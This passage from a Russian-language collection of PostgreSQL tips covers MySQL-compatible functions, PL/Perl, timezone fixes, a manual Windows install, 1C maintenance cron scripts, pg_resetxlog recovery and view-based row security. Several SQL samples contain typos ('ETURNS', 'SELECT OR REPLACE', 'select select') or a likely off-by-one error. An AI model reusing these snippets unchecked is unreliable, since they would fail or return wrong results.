varchar, c4 varchar, c5 varchar, c6 varchar, c7 bigint) SERVER sqlite_kladr_server OPTIONS (table 'kladr_tbl'); CREATE FOREIGN TABLE kladr.doma_tbl( id bigint, house varchar, c1 varchar, c2 varchar, c3 varchar, c4 varchar, c5 varchar, c6 varchar, c7 varchar) SERVER sqlite_kladr_server OPTIONS (table 'doma_tbl'); CREATE FOREIGN TABLE kladr.altnames_tbl( id bigint, code1 varchar, code2 varchar, c1 varchar) SERVER sqlite_kladr_server OPTIONS (table 'altnames_tbl'); Проверяем работу select * from kladr.kladr_tbl limit 10; Результат: Кладр подключен к базе данных PostgreSQL.

PlPerl и PlSQL

Реализация для PostgreSQL некоторых популярных функций из состава MySQL (доп. ссылка 1) Автор: Pavel Stěhule [комментарии]

Реализация MySQL функции field для PostgreSQL, позволяющей организовать условную сортировку вывода: CREATE OR REPLACE FUNCTION field(text, variadic text[]) RETURNS int AS $$ SELECT i FROM generate_subscripts($2,1) g(i) WHERE $1 = $2[i] UNION ALL SELECT 0 LIMIT 1 $$ LANGUAGE sql STRICT; Результат использования: select * from pet order by field(species, 'cat', 'dog', 'bird'); | name | owner | species | sex | birthday | death | | Fluffy | Harold | cat | f | 1993-02-04 | NULL | | Claws | Gwen | cat | m | 1994-03-17 | NULL | | Buffy | Harold | dog | f | 1989-05-13 | NULL | | Fang | Benny | dog | m | 1990-08-27 | NULL | | Bowser | Diane | dog | m | 1989-08-31 | 1995-07-29 | | Chirpy | Gwen | bird | f | 1998-09-11 | NULL | | Whistler | Gwen | bird | NULL | 1997-12-09 | NULL | Результаты портирования некоторых строковых функций MySQL, которые можно использовать для упрощения переноса программ с MySQL на PostgreSQL: concat CREATE OR REPLACE FUNCTION concat(variadic str text[]) RETURNS text AS $$ SELECT array_to_string($1, ''); $$ LANGUAGE sql concat_ws CREATE OR REPLACE FUNCTION concat_ws(separator text, variadic str text[]) RETURNS text as $$ SELECT array_to_string($2, $1); $$ LANGUAGE sql; elt CREATE OR REPLACE FUNCTION elt(int, VARIADIC text[]) RETURNS text AS $$ SELECT $2[$1]; $$ LANGUAGE sql; find_in_set CREATE OR REPLACE FUNCTION find_in_set(str text, strlist text) RETURNS int AS $$ SELECT i FROM generate_subscripts(string_to_array($2,','),1) g(i) WHERE (string_to_array($2, ','))[i] = $1 UNION ALL SELECT 0 LIMIT 1 $$ LANGUAGE sql STRICT; hex CREATE OR REPLACE FUNCTION hex(int) RETURNS text AS $$ SELECT upper(to_hex($1)); $$ LANGUAGE sql; CREATE OR REPLACE FUNCTION hex(bigint) RETURNS text AS $$ SELECT upper(to_hex($1)); $$ LANGUAGE sql; CREATE OR REPLACE FUNCTION hex(text) RETURNS text AS $$ SELECT upper(encode($1::bytea, 'hex')) $$ LANGUAGE sql; char, напирмер: select "char"(77,121,83,81,'76'); CREATE OR REPLACE FUNCTION "char"(VARIADIC int[]) ETURNS text AS $$ SELECT array_to_string(ARRAY(SELECT chr(unnest($1))),'') $$ LANGUAGE sql; lcase CREATE OR REPLACE FUNCTION lcase(str text) RETURNS text AS $$ SELECT lower($1) $$ LANGUAGE sql; left CREATE OR REPLACE FUNCTION left(str text, len int) RETURNS text AS $$ SELECT substring($1 FROM 1 FOR $2) $$ LANGUAGE sql; locate CREATE OR REPLACE FUNCTION locate(substr text, str text) RETURNS int AS $$ SELECT position($1 in $2) $$ LANGUAGE sql; reverse CREATE OR REPLACE FUNCTION reverse(str text) RETURNS text AS $$ SELECT array_to_string(ARRAY(SELECT substring($1 FROM i FOR 1) FROM generate_series(length($1),1,-1) g(i)), '') $$ LANGUAGE sql; right CREATE OR REPLACE FUNCTION right(str text, len int) RETURNS text AS $$ SELECT substring($1 FROM length($1) - $2 FOR $2) $$ LANGUAGE sql; space CREATE OR REPLACE FUNCTION space(n int) RETURNS text AS $$ SELECT repeat(' ', $1) $$ LANGUAGE sql; strcmp CREATE OR REPLACE FUNCTION strcmp(text, text) RETURNS int AS $$ SELECT CASE WHEN $1 < $2 THEN -1 WHEN $1 > $2 THEN 1 ELSE 0 END; $$ LANGUAGE sql; substring_index CREATE OR REPLACE FUNCTION substring_index(str text, delim text, count int) RETURNS text AS $$ SELECT CASE WHEN $3 > 0 THEN array_to_string((string_to_array($1, $2))[1:$3], $2) ELSE array_to_string(ARRAY(SELECT unnest(string_to_array($1,$2)) OFFSET array_upper(string_to_array($1,$2),1) + $3), $2) END $$ LANGUAGE sql; ucase CREATE OR REPLACE FUNCTION ucase(str text) RETURNS text AS $$ SELECT upper($1) $$ LANGUAGE sql; CREATE CAST (bytea AS text) WITHOUT FUNCTION AS ASSIGNMENT; unhex CREATE OR REPLACE FUNCTION unhex(text) RETURNS text AS $$ SELECT decode($1, 'hex')::text; $$ LANGUAGE sql; Функции для работы с датой и временем: adddate, пример select adddate('2008-01-02','31 day'); CREATE OR REPLACE FUNCTION adddate(date, interval) RETURNS date AS $$ SELECT ($1 + $2)::date; $$ LANGUAGE sql; curdate CREATE OR REPLACE FUNCTION curdate() RETURNS date AS $$ SELECT CURRENT_DATE $$ LANGUAGE sql; convert_tz CREATE OR REPLACE FUNCTION convert_tz(dt timestamp, from_tz text, to_tz text) RETURNS timestamp AS $$ SELECT ($1 AT TIME ZONE $2) AT TIME ZONE $3; $$ LANGUAGE sql; date CREATE OR REPLACE FUNCTION date(anyelement) RETURNS date AS $$ SELECT $1::date; $$ LANGUAGE sql; datediff SELECT OR REPLACE FUNCTION datediff(date, date) RETURNS int AS $$ SELECT $1 - $2 $$ LANGUAGE sql; date_add CREATE OR REPLACE FUNCTION date_add(date, interval) RETURNS date AS $$ SELECT adddate($1, $2) $$ LANGUAGE sql; date_format CREATE OR REPLACE FUNCTION date_format(date, text) RETURNS text AS $$ SELECT to_char($1, _mysqlf_pgsql($2)) $$ LANGUAGE sql; CREATE OR REPLACE FUNCTION date_format(timestamp, text) RETURNS text AS $$ SELECT to_char($1, _mysqlf_pgsql($2)) $$ LANGUAGE sql; date_sub CREATE OR REPLACE FUNCTION date_sub(date, interval) RETURNS date AS $$ SELECT ($1 - $2)::date; $$ LANGUAGE sql; dayofmonth CREATE OR REPLACE FUNCTION dayofmonth(date) RETURNS int AS $$ SELECT EXTRACT(day from $1)::int $$ LANGUAGE sql; day CREATE OR REPLACE FUNCTION day(date) RETURNS int AS $$ SELECT dayofmonth($1) $$ LANGUAGE sql; dayname CREATE OR REPLACE FUNCTION dayname(date) RETURNS text AS $$ SELECT to_char($1, 'TMDay') $$ LANGUAGE sql; dayofweek CREATE OR REPLACE FUNCTION dayofweek(date) RETURNS int AS $$ SELECT EXTRACT(dow FROM $1)::int $$ LANGUAGE sql; dayofyear CREATE OR REPLACE FUNCTION dayofyear(date) RETURNS int AS $$ SELECT EXTRACT(doy FROM $1)::int $$ LANGUAGE sql; from_days CREATE OR REPLACE FUNCTION from_days(int) RETURNS date AS $$ SELECT date '0001-01-01bc' + $1 $$ LANGUAGE sql; from_unixtime CREATE OR REPLACE FUNCTION from_unixtime(double precision) RETURNS timestamp AS $$ SELECT to_timestamp($1)::timestamp $$ LANGUAGE sql; _mysqlf_pgsql CREATE OR REPLACE FUNCTION _mysqlf_pgsql(text) RETURNS text AS $$ SELECT array_to_string(ARRAY(SELECT s FROM (SELECT CASE WHEN substring($1 FROM i FOR 1) <> '%' AND substring($1 FROM i-1 FOR 1) <> '%' THEN substring($1 FROM i for 1) ELSE CASE substring($1 FROM i FOR 2) WHEN '%H' THEN 'HH24' WHEN '%p' THEN 'am' WHEN '%Y' THEN 'YYYY' WHEN '%m' THEN 'MM' WHEN '%d' THEN 'DD' WHEN '%i' THEN 'MI' WHEN '%s' THEN 'SS' WHEN '%a' THEN 'Dy' WHEN '%b' THEN 'Mon' WHEN '%W' THEN 'Day' WHEN '%M' THEN 'Month' END END s FROM generate_series(1,length($1)) g(i)) g WHERE s IS NOT NULL), '') $$ LANGUAGE sql; get_format CREATE OR REPLACE FUNCTION get_format(text, text) RETURNS text AS $$ SELECT CASE lower($1) WHEN 'date' THEN CASE lower($2) WHEN 'usa' THEN '%m.%d.%Y' WHEN 'jis' THEN '%Y-%m-%d' WHEN 'iso' THEN '%Y-%m-%d' WHEN 'eur' THEN '%d.%m.%Y' WHEN 'internal' THEN '%Y%m%d' END WHEN 'datetime' THEN CASE lower($2) WHEN 'usa' THEN '%Y-%m-%d %H-.%i.%s' WHEN 'jis' THEN '%Y-%m-%d %H:%i:%s' WHEN 'iso' THEN '%Y-%m-%d %H:%i:%s' WHEN 'eur' THEN '%Y-%m-%d %H.%i.%s' WHEN 'internal' THEN '%Y%m%d%H%i%s' END WHEN 'time' THEN CASE lower($2) WHEN 'usa' THEN '%h:%i:%s %p' WHEN 'jis' THEN '%H:%i:%s' WHEN 'iso' THEN '%H:%i:%s' WHEN 'eur' THEN '%H.%i.%s' WHEN 'internal' THEN '%H%i%s' END END; $$ LANGUAGE sql; hour CREATE OR REPLACE FUNCTION hour(time) RETURNS int AS $$ SELECT EXTRACT(hour FROM $1)::int; $$ LANGUAGE sql; CREATE OR REPLACE FUNCTION hour(timestamp) RETURNS int AS $$ SELECT EXTRACT(hour FROM $1)::int; $$ LANGUAGE sql; last_day CREATE OR REPLACE FUNCTION last_day(date) RETURNS date AS $$ SELECT (date_trunc('month',$1 + interval '1 month'))::date - 1 $$ LANGUAGE sql; makedate CREATE OR REPLACE FUNCTION makedate(year int, dayofyear int) RETURNS date AS $$ SELECT (date '0001-01-01' + ($1 - 1) * interval '1 year' + ($2 - 1) * interval '1 day'):: date $$ LANGUAGE sql; maketime CREATE OR REPLACE FUNCTION maketime(int, int, double precision) RETURNS time AS $$ SELECT time '00:00:00' + $1 * interval '1 hour' + $2 * interval '1 min' + $3 * interval '1 sec' $$ LANGUAGE sql; minute CREATE OR REPLACE FUNCTION minute(timestamp) RETURNS int AS $$ SELECT EXTRACT(minute FROM $1)::int $$ LANGUAGE sql; month CREATE OR REPLACE FUNCTION month(date) RETURNS int AS $$ SELECT EXTRACT(month FROM $1)::int $$ LANGUAGE sql; monthname CREATE OR REPLACE FUNCTION monthname(date) RETURNS text AS $$ SELECT to_char($1, 'TMMonth') $$ LANGUAGE sql; str_to_date CREATE OR REPLACE FUNCTION str_to_date(text, text) RETURNS date AS $$ SELECT to_date($1, _mysqlf_pgsql($2)) $$ LANGUAGE sql; time CREATE OR REPLACE FUNCTION time(timestamp) RETURNS time AS $$ SELECT $1::time $$ LANGUAGE sql; to_days CREATE OR REPLACE FUNCTION to_days(date) RETURNS int AS $$ SELECT $1 - '0001-01-01bc' $$ LANGUAGE sql; unix_timestamp CREATE OR REPLACE FUNCTION unix_timestamp() RETURNS double precision AS $$ SELECT EXTRACT(epoch FROM current_timestamp) $$ LANGUAGE sql; CREATE OR REPLACE FUNCTION unix_timestamp(timestamp) RETURNS double precision AS $$ SELECT EXTRACT(epoch FROM $1) $$ LANGUAGE sql; year CREATE OR REPLACE FUNCTION year(date) RETURNS int AS $$ SELECT EXTRACT(year FROM $1) $$ LANGUAGE sql; week CREATE OR REPLACE FUNCTION week(date) RETURNS int AS $$ SELECT EXTRACT(week FROM $1)::int; $$ LANGUAGE sql; Эмуляция работы GROUP_CONCAT в PostreSQL: select array_to_string(array_agg(x),',') from omega; Дополнительно можно обратить внимание на проект http://pgfoundry.org/projects/mysqlcompat/ , в рамках которого ведется работа по портированию для PostgreSQL некоторых MySQL функций.

Создание глобальных переменных в pl/perl процедурах в PostgreSQL (доп. ссылка 1) Автор: Олег Бартунов [комментарии]

CREATE OR REPLACE FUNCTION reset_counter() RETURNS INT AS $$ $_SHARED{counter} = 0; return 0; $$ LANGUAGE plperl; CREATE OR REPLACE FUNCTION counter() RETURNS INT AS $$ return $_SHARED{counter}++; $$ LANGUAGE plperl;

Как в PosgreSQL кешировать результат работы функции внутри запроса [обсудить]

CREATE FUNCTION ... LANGUAGE 'SQL' IMMUTABLE; Для старых версий: CREATE FUNCTION ... LANGUAGE 'SQL' WITH (ISCACHABLE);

Pl/Perl для PostgreSQL Автор: Yuri A. Kabaenkov [обсудить]

Функции написанные на pl/perl и даже pl/pgsql будут работать только в том случае если у вас установлен данный язык к вашей базе. Посмотреть какие языки установлены можно командой 'select * from pg_language;` Обычно стоят только С,SQL и internal(что такое объяснять не буду). Для установке pl/perl вам нужно выполнить следующую команду. createlang plperl <dbname> Если же вы хотите чтоб pl/perl или pl/pgsql устанавливался автоматически на все создаваемые базы, то cratelang plperl template1

Как написать встроенную SQL функцию на Perl и экранировать одинарные кавычки [комментарии]

CREATE FUNCTION totalcomp(integer, integer) RETURNS integer AS ' my $a = ''test''; # ''- Экранирование кавычки. return $_[0] + $_[1]; ' LANGUAGE 'plperl';

Как создать свою функцию для PostgreSQL. [обсудить]

CREATE FUNCTION login2contract(varchar) RETURNS int4 AS 'select contract_id from profile where login = $1' LANGUAGE 'SQL'; CREATE FUNCTION time_minus_int(timestamp, integer) RETURNS timestamp AS 'select $1 - interval ($2) AS RESULT' LANGUAGE 'SQL';

Оптимизация и администрирование PostgreSQL

Отмена перехода на зимнее время в PostgreSQL [комментарии]

В PostgreSQL используется своя внутренняя таблица временных зон (postgresql-x.x.x/src/timezone), поэтому обновление системной базы zoneinfo не повлияет на перевод часов в PostgreSQL. Смотрим текущее состояние: SELECT * FROM pg_timezone_names; Europe/Moscow | MSK | 03:00:00 | f Как видим часы перевелись и используется смещение +3 вместо +4. SELECT now(); 2011-11-01 11:00:19.834213+03 SELECT now()-'6 days'::interval; 2011-10-26 11:00:52.155833+04 Копируем актуальные данные из обновлённой в системе базы часовых поясов. База часовых поясов в PostgreSQL может оказаться в /usr/local/share/pgsql/timezone, /usr/share/pgsql/timezone или /usr/local/pgsql/share/timezone/. Например: cp -f /usr/share/zoneinfo/Europe/Moscow /usr/share/pgsql/timezone/Europe/Moscow После этого "SELECT * FROM pg_timezone_names" отобразит изменения, но чтобы они подействовали обязательно требуется перезапустить PostgreSQL. Для изменения часового пояса для конкретной БД можно использовать конструкцию: ALTER DATABASE mydb SET timezone TO 'Asia/Yekaterinburg'; Из других подводных камней, которые обнаружились при отмене перехода на зимнее время можно упомянуть забытое обновление /etc/localtime в chroot-окружениях и необходимость перезапуска демона cron.

Установка PostgreSQL под Windows вручную Автор: Аноним [комментарии]

Задача: установить PostgreSQL в Windows без использования инсталлятора. 1. Распаковываем архив c бинарниками (можно взять из готовой установки или с сайта http://www.enterprisedb.com/products-services-training/pgbindownload ) в C:\PostgreSQL 2. Создаём каталог C:\PostgreSQL\data - там будут лежать данные базы 3. Создаем пользователя postgres с паролем pwd. В командной строке вводим: net user postgres pwd /add 4. Устанавливаем ему неограниченный срок действия пароля: WMIC UserAccount WHERE Name="postgres" Set PasswordExpires=FALSE 5. Даем право входа в качестве службы утилитой ntrights из Windows Resource Kit Tools: ntrights +r SeServiceLogonRight -u postgres 6. Даем все права на каталог C:\PostgreSQL: cacls C:\PostgreSQL /E /G postgres:F 7. Создаем в C:\PostgreSQL\bin текстовый файл с именем pf, содержащий пароль pwd 8. В C:\PostgreSQL\bin выполняем команду по инициализации базы: initdb -U postgres --pwfile=pf -A md5 -E UTF8 --locale=Russian_Russia -D C:\PostgreSQL\data 9. Регистрируем сервис: pg_ctl register -N PostgreSQL -U postgres -P pwd -D C:\PostgreSQL\data -S auto 10. Запускаем службу: sc start PostgreSQL Для удобства прописываем путь к бинарным файлам PostgreSQL в PATH: pathman /as c:\PostgreSQL\bin

Опыт обслуживания базы 1С в PostgreSQL (доп. ссылка 1) Автор: sashacd [комментарии]

Знакомство с СУБД PostgreSQL было определено выходом версии платформы "1С:Предприятие 8.1", в которой была реализована поддержка СУБД PostgreSQL. Но все встречи с PostgreSQL проходили на резервном сервере (с ОС Linux), где методом тестового использования решался вопрос об использовании PostgreSQL в качестве СУБД для рабочей базы 1С. В это время на основном сервере (с ОС Linux) база 1С работала в файл-серверном режиме. До поры до времени шел процесс перехода со старой системы на 1С - нормативно справочная информация была перенесена заранее, а в это время переносились текущие остатки. Количество пользователей (менее 10) и размер файла базы 1С (менее 3Gb) позволяли работать в файл-серверном режиме. Шло время. Пользователи по мере внедрения переводились из старой системы в 1С. Количество пользователей росло. Размер файла базы данных тоже увеличивался в размере. Настало время подключать к базе 1С удаленных пользователей в терминальном режиме (FreeNX). Количество лицензий опять пришлось увеличить. Хорошо, что получилось поменять один ключ на ключ с большим количеством пользовательских лицензий и количество компьютеров для менеджера лицензий не увеличилось. И тут произошло самое скучное - размер базы данных 1С вырос до неприличных размеров. Все вместе, количество одновременно работающих в 1С пользователей более 10 и размер файла базы данных 1С более 4Gb, стало очень негативно сказываться на производительности работы пользователей в 1С. Настало время серьезного знакомства с возможностью размещения базы 1С в СУБД PostgreSQL. Пользуясь знакомством с СУБД PostgreSQL, переезд на SQL-версию размещения данных 1С прошел быстро и без жертв (сервер с ОС Linux). Время шло. Размер системного каталога PostgreSQL с базой 1C достиг размера 35Gb. Размер dt-файла выгрузки базы 1С стал где-то около 1.2Gb, а развернутая база на его основе 16Gb. Пришло время придумать что-то еще для обеспечения производительной работы пользователей в 1С. Пользуясь документацией PostgreSQL, которая идет в комплекте с СУБД, оформилось две команды по обслуживанию базы "baza1c_81" в PostgreSQL. Эти команды выполняют сбор мусора, выполнение сбора статистики о базе данных для работы планировщика запросов, переиндексацию: VACUUM FULL VERBOSE ANALYZE; REINDEX DATABASE baza1c_81 FORCE; (Хотя с FULL в первой команде лучше для себя определиться еще раз самостоятельно, http://wiki.PostgreSQL.org/wiki/VACUUM_FULL и в документации PostgreSQL см. VACUUM). Далее дело техники. Определили время запуска. В воскресенье с 17-00 до понедельника 6-00 в базе никого не бывает. В cron отключаем ночное архивирование базы в это время (а архивировать лучше как средствами 1С, так и pgdump). Первым шагом в cron добавляем строку для создания архива: Запускаем crontab -e: 0 17 * * 0 /var/lib/pgsql/backups/pgdump.sh :wq , где 0-мин, 17-час, *-день, *-месяц, 0-(день недели воскресенье); Вторым шагом добавляем в cron строку выполнения первой команды : 0 18 * * 0 /var/lib/pgsql/backups/vacuum.sh , учтем 30 минут на работу pgdump.sh по созданию архива; В vacuum.sh делаем стоп-старт сервера предприятия 1C, PostgreSQL, менеджера лицензий и VACUUM : #!/bin/sh # reindex BD PIDEL=`pidof Xvfb` if [ ! "$PIDEL" = "" ]; then ##иногда выгрузка из 1С в WINE зависает kill -9 $PIDEL fi # stop 1c-server /bin/sh /etc/rc.d/rc.1c stop #kill all running session nx /bin/sh /etc/NX/bin/nxserver --cleanup sleep 150 #перешли на stop start /bin/sh /etc/NX/bin/nxserver --stop /bin/sh /etc/rc.d/rc.sshd stop rm /tmp/.nX* rm /tmp/.X* rm /tmp/.X11-unix/X29 ## следы от запуска Xvfb #-------------- /bin/killall nxserver /bin/killall nxnode /bin/killall nxagent # sleep 150 /bin/sh /etc/rc.d/rc.sshd start /bin/sh /etc/NX/bin/nxserver --start #-------------- # start 1c-server sleep 150 /bin/sh /etc/rc.d/rc.1c start sleep 150 su postgres -c /var/lib/pgsql/backups/vacuumdb.sh В vacuumdb.sh : #!/bin/sh psql -a -f /var/lib/pgsql/backups/vacuum.sql В vacuum.sql : VACUUM FULL VERBOSE ANALYZE; Команда по факту работает от 6 до 8 часов. Вторым шагом добавляем в cron строку выполнения второй команды: 30 3 * * 1 /var/lib/pgsql/backups/reindex.sh ,учтем время на работу vacuum.sh; В reindex.sh все тоже, что и в vacuum.sh, за исключением одной строчки. Вместо su postgres -c /var/lib/pgsql/backups/vacuumdb.sh напишем su postgres -c /var/lib/pgsql/backups/reindexdb.sh. В reindexdb.sh : #!/bin/sh psql -a -f /var/lib/pgsql/backups/reindex.sql В reindex.sql : REINDEX DATABASE baza1c_81 FORCE; И в каждый понедельник база готова к эффективной работе. А время идет. Подумываем об использовании SSD-дисков для размещения WAL. PS. Если начинаете править postgresql.conf, тогда после изменений убедитесь в успешном старте PostgreSQL c новым postgresql.conf. Также необходимо убедиться в успешном создании архивной копии, лучше всего восстановив базу на резервном сервере из архивной копии. PPS. Расчет себестоимости.... иногда этот расчет начинает очень сильно задумываться о чем-то своем. Так вот, в этом случае можно попробовать отключить в конфигурационном файле PostgreSQL autovacuum, выполнить стоп-старт "Менеджер лицензий-Сервер предприятия-PostgreSQL". После расчета себестоимости в конфигурационном файле вернуть все назад, стоп-старт. Оценить время расчета и сделать вывод о необходимости повтора этих действий. PPPS. Больная тема - остановка менеджера лицензий. И точнее всего эта остановка прикладывается в пятницу, вечером. Это когда подходит время в цехе запустить 1С и добавить в систему отчет производства за смену, или на складе готовой продукции идет отгрузка во вторую смену. В другие дни решить эту проблему помогает удаленный доступ, но в пятницу.... Для спокойного выполнения пятничных планов делаем маленькое дополнение в cron, а именно добавляем следующую строку : 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /var/lib/pgsql/backups/hasp.restore В hasp.restore запишем : #!/bin/sh FLAG=$(ps -A | grep hasplm | wc -l) CUR_DATE=20$(date +%y).$(date +%m).$(date +%d)-$(date +%H)$(date +%M)$(date +%S): if [ $FLAG -eq 2 ] then echo "$CUR_DATE hasplm running" >> /var/log/hasp.restore.log else #echo "false" hasplm & echo "$CUR_DATE RESTORE hasplm" >> /var/log/hasp.restore.log fi И после выполнения crontab -e, с необходимым интервалом будет происходить проверка работы менеджера лицензий и запуск его в случае необходимости. Еще добавим в каталоге logrotate.d в файле syslog два файла для logrotate (автоматическая архивация log-файлов) /var/mail/root /var/log/hasp.restore.log А потом в свободное время смотрим tcpdump (или еще как то), вычисляем с какого адреса забивают наш менеджер лицензий. А там тоже может стоять менеджер лицензий, и даже совсем не 1С. Если находим такой адрес, добавляем правило в iptables не оставляя ему шансов присылать нам эти приветы.

Отмена запущенных запросов в PostgreSQL (доп. ссылка 1) Автор: Konstantin A Mironov [комментарии]

Для отмены запущенных длительных запросов в PostgreSQL можно воспользоваться системными SP. Например, отменить множественные INSERT или множество продолжительных запросов: SELECT pg_cancel_backend(procpid) as x FROM pg_stat_activity WHERE current_query like 'INSERT%'; Если запрос инициирован из интерфейса pgsql, то завершени работы pgsql не поможет - запрос все равно продолжит свое выполнение, необходимо именно вызывать pg_cancel_backend.

Восстановление PostgreSQL после повреждения файлов XLOG (доп. ссылка 1) Автор: Konstantin A Mironov [комментарии]

Бывают случаи, когда файлы журнала транзакций (pg_xlog) могут быть повреждены или случайно удалены. В таком случае PostgreSQL не сможет работать и просто не запустится с подобной ошибкой: Jul 4 11:30:18 database postgres[92997]: [1-1] LOG: database system was interrupted at 2009-07-04 11:24:30 MSD Jul 4 11:30:18 database postgres[92997]: [2-1] LOG: could not open file "pg_xlog/000000010000031A00000027" (log file 794, segment 39): No such file or directory Jul 4 11:30:18 database postgres[92997]: [3-1] LOG: invalid primary checkpoint record Jul 4 11:30:18 database postgres[92997]: [4-1] LOG: could not open Найти поврежденный xlog-файл вряд ли получится, поэтому выход один - очистить информацию в БД об используемых логах. Для этого есть штатная утилита pg_resetxlog Но перед ее использованием надо узнать что именно вытирать из БД. Для этого делаем: # pg_controldata /var/db/pgsql/| grep "Latest checkpoint" Latest checkpoint's REDO location: 31A/27FFF7B8 Latest checkpoint's UNDO location: 0/0 Latest checkpoint's TimeLineID: 1 Latest checkpoint's NextXID: 0/2400998005 Latest checkpoint's NextOID: 75014368 С этой информации нам интересны последние строчки с (NextXID, NextOID). Переходим в пользователя от имени которого выполняется PGSQL (в моем случае, это pgsql) # su pgsql И теперь сбрасываем логи, указав в параметрах наши цифры из данных pg_control $ pg_resetxlog -o 75014368 -x 2400998005 -f /var/db/pgsql/ Transaction log reset Все, PGSQL теперь не помнит, что у него были когда-то логи транзакций и спокойно запустится, начав создавать их по-новой. PS: Хочется напомнить, что любые действия по восстановлению данных, требуют сохранения исходных данных перед любыми действиями над ними. Ну и максмум осторожности :)

Ускорение загрузки дампа PostgreSQL на многоядерных системах (доп. ссылка 1) [комментарии]

В бета версии PostgreSQL 8.4 в утилите pg_restore появилась поддержка возможности загрузки дампа в несколько параллельных потоков. Например, загрузка дампа базы размером 300 Гб на 8-ядерном сервере занимала стандартным образом 12 часов, при распараллеливании процесса загрузки на 8 потоков, время загрузи сократилось до 3 часов. Полная перезагрузка дампа базы может понадобиться например при миграции с PostgreSQL 8.2 на 8.3 или при переходе с 32- на 64-разрядную сборку системы. Огромным плюсом является и то, что параллельный вариант pg_restore из ветки 8.4 прекрасно работает с ветками 8.2 и 8.3. Рассмотрим процесс миграции с 8.2 на 8.3. На рабочей машине дополнительно установим в отдельную директорию бета версию 8.4: ./configure --prefix=/usr/local/pgsql84 make make install Создаем дамп работающей базы PostgreSQL 8.2, использую утилиту pg_dump из состава PostgreSQL 8.3: /usr/local/pgsql83/bin/pg_dump -F c -v -f my_db.dump my_database В зависимости от конфигурации дополнительно может потребоваться сделать дамп ролей: /usr/local/pgsql83/bin/pg_dumpall -g -f my_roles.dump Восстанавливаем роли: /usr/local/pgsql83/bin/psql -f my_roles.dump postgres Запускаем процесс параллельного восстановления базы, число потоков задается через опцию -j, в нашем случае используется загрузка в 8 потоков. При указании большого числа потоков нужно быть уверенным, что система ввода/вывода не окажется узким местом, т.е. база размещена на высокопроизводительном хранилище: /usr/local/pgsql84/bin/pg_restore -F c -j 8 -v -C -f my_db.dump Дополнительно можно упомянуть, что в рамках проекта EnterpriseDB ведется разработка утилиты pg_migrator (http://pgfoundry.org/projects/pg-migrator/), позволяющей осуществлять перенос базы на новый сервер без остановки работы СУБД. Но pg_migrator к сожалению находится еще на стадии альфа тестирования. Некоторые советы по оптимизации процесса создания дампа и его восстановления: * Во время восстановления можно отключить fsync режим и autovacuum, значительно увеличить размер памяти (до 1 Гб если памяти много), заданный в параметрах конфигурации work_mem и maintenance_work_mem, при этом размер wal_buffers и checkpoint_segments также нужно увеличить до 16 или 32 Мб; * При наличии больших GIN или GiST индексов, время восстановления которых нередко занимает 75% от всего времени восстановления, если без этих индексов можно себе позволить немного поработать, имеет смысл разделить процесс восстановления на две стадии: восстановление первичных данных, запуск БД в продакшин, восстановление GIN или GiST индексов уже на работающей базе. * Всегда следует использовать pg_dump из более новой версии PostgreSQL, а не из старой, апгрейд которой производится. * Для продакшин систем, время и наличие возможных подводных камней стоит предварительно оценить, выполнив тестовые dump/restore без остановки первичной базы;

PostgreSQL: безопасность на уровне строк (row level security) Автор: FLUF [комментарии]

Некоторые базы данных, такие как MSSQL и MySQL5, имеют специальные механизмы для разграничения доступа пользователей к различным ресурсам БД вплоть до ячеек таблиц. PostgreSQL не нуждается в таких излишествах. На практике обычно требуется разграничить доступ на уровне строк. Для того, что бы сделать это, есть простой способ, основанный на использовании представлений, правил и функции current_user() или эквивалентного ей ключевого слова user. Создадим любую таблицу от имени 'postgres', в которой обязательно должно присутствовать поле для хранения логина: CREATE TABLE table1 ( fio text NOT NULL, name text, something integer, login text, CONSTRAINT table1_pkey PRIMARY KEY (fio) ) WITHOUT OIDS; ALTER TABLE table1 OWNER TO postgres; Ни один пользователь не имеет никаких привилегий на эту таблицу. Создадим представление, и дадим необходимым пользователям некоторые привилегии: CREATE OR REPLACE VIEW table1v AS SELECT table1.fio, table1.name, table1.something FROM table1 WHERE table1.login = user; ALTER TABLE table1v OWNER TO postgres; GRANT SELECT, UPDATE, INSERT, DELETE ON TABLE table1v TO math_user; Создадим три правила - для вставки, обновления и удаления строк из представления: CREATE OR REPLACE RULE add AS ON INSERT TO table1v DO INSTEAD INSERT INTO table1 (fio, name, something, login) VALUES (new.fio, new.name, new.something, user); CREATE OR REPLACE RULE upd AS ON UPDATE TO table1v DO INSTEAD UPDATE table1 SET fio = new.fio, name = new.name, something = new.something, login = user WHERE table1.login = user; CREATE OR REPLACE RULE del AS ON DELETE TO table1v DO INSTEAD DELETE FROM table1 where login=user; Готово! Теперь пользователь math_user может просматривать или удалять только свои записи и вставлять или изменять записи только под своим именем.

Как в PostgreSQL ограничить число одновременных сессий для базы и пользователя (доп. ссылка 1) [комментарии]

Начиная с PostgreSQL 8.1 появилась возможность ограничения числа соединений к серверу для отдельного пользователя и базы: ALTER ROLE имя_пользователя CONNECTION LIMIT число; ALTER DATABASE имя_базы CONNECTION LIMIT число; Можно указать лимит при создании базы или пользователя: CREATE USER имя_пользователя CONNECTION LIMIT число ENCRYPTED PASSWORD 'пароль'; CREATE DATABASE имя_базы OWNER имя_пользователя CONNECTION LIMIT число;

Как посмотреть размер баз и таблиц в PostgreSQL [комментарии]

Для сопоставления OID номеров и имен баз и таблиц в contrib есть утилита oid2name. Для просмотра размера таблиц для текущей базы: SELECT relname AS name, relfilenode AS oid, (relpages * 8192 / (1024*1024))::int as size_mb, reltuples as count FROM pg_class WHERE relname NOT LIKE 'pg%' ORDER BY relpages DESC; Для просмотра общего размера баз можно использовать скрипт: #!/bin/sh oid2name=/usr/local/pgsql/bin/oid2name pg_data_path=/usr/local/pgsql/data/base { $oid2name| grep '='| while read oid delim name; do size=`du -s $pg_data_path/$oid|cut -f1` echo "$size $name" done }|sort -rn Другой вариант просмотра размера базы: select pg_database_size('имя базы'); Размер таблицы: select select pg_relation_size('имя таблицы'); Полный размер таблицы с сопутствующих индексов. select pg_total_relation_size('имя таблицы'); Размер столбцов select pg_column_size('имя стобца') from 'имя таблицы'; Состояние всех настроек можно посмотреть через функцию pg_show_all_settings().

Как вытащить тело PostgreSQL функции из системного каталога (доп. ссылка 1) Автор: Олег Бартунов [комментарии]

